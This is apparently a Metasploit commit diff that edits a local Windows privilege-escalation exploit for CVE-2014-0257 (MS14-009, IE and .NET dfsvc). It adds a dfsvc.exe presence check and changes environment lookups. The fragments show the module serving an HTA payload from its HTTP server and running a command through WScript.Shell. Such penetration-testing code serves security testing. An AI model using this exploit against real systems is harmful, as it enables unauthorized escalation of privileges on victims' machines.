Check for the .NET dfsvc and use %windir%

2014-05-30 09:02:43 -05:00 · 2014-05-30 09:02:43 -05:00 · 1dbd36a3dd
parent ffbcbe8cc1
commit 1dbd36a3dd
2 changed files with 6 additions and 2 deletions
--- a/data/exploits/CVE-2014-0257/CVE-2014-0257.dll
+++ b/data/exploits/CVE-2014-0257/CVE-2014-0257.dll
--- a/modules/exploits/windows/local/ms14_009_ie_dfsvc.rb
+++ b/modules/exploits/windows/local/ms14_009_ie_dfsvc.rb
@ -15,6 +15,7 @@ class Metasploit3 < Msf::Exploit::Local
  include Msf::Exploit::EXE
  include Msf::Exploit::Remote::HttpServer
  include Msf::Post::Windows::Priv
+  include Msf::Post::File

  def initialize(info={})
    super( update_info( info,
@ -68,6 +69,10 @@ class Metasploit3 < Msf::Exploit::Local
      fail_with(Failure::NotVulnerable, "Not running at Low Integrity")
    end

+    unless file_exist?("#{get_env("windir")}\\Microsoft.NET\\Framework\\v4.0.30319\\dfsvc.exe")
+      fail_with(Failure::NotVulnerable, ".NET Deployment Service (dfsvc.exe) not found")
+    end
+
    begin
      Timeout.timeout(datastore['DELAY']) { super }
    rescue Timeout::Error
@ -78,7 +83,7 @@ class Metasploit3 < Msf::Exploit::Local
    exploit_uri = "#{get_uri}/#{rand_text_alpha(4 + rand(4))}.hta"
    session.railgun.kernel32.SetEnvironmentVariableA("MYURL", exploit_uri)

-    temp = session.sys.config.getenv('TEMP')
+    temp = get_env('TEMP')

    print_status("Loading Exploit Library...")

@ -101,7 +106,6 @@ var shell = new ActiveXObject("WScript.Shell");
 shell.Run(command);
 </script>
      eos
-      print_status(hta)
      send_response(cli, hta, {'Content-Type'=>'application/hta'})
    else
      send_not_found(cli)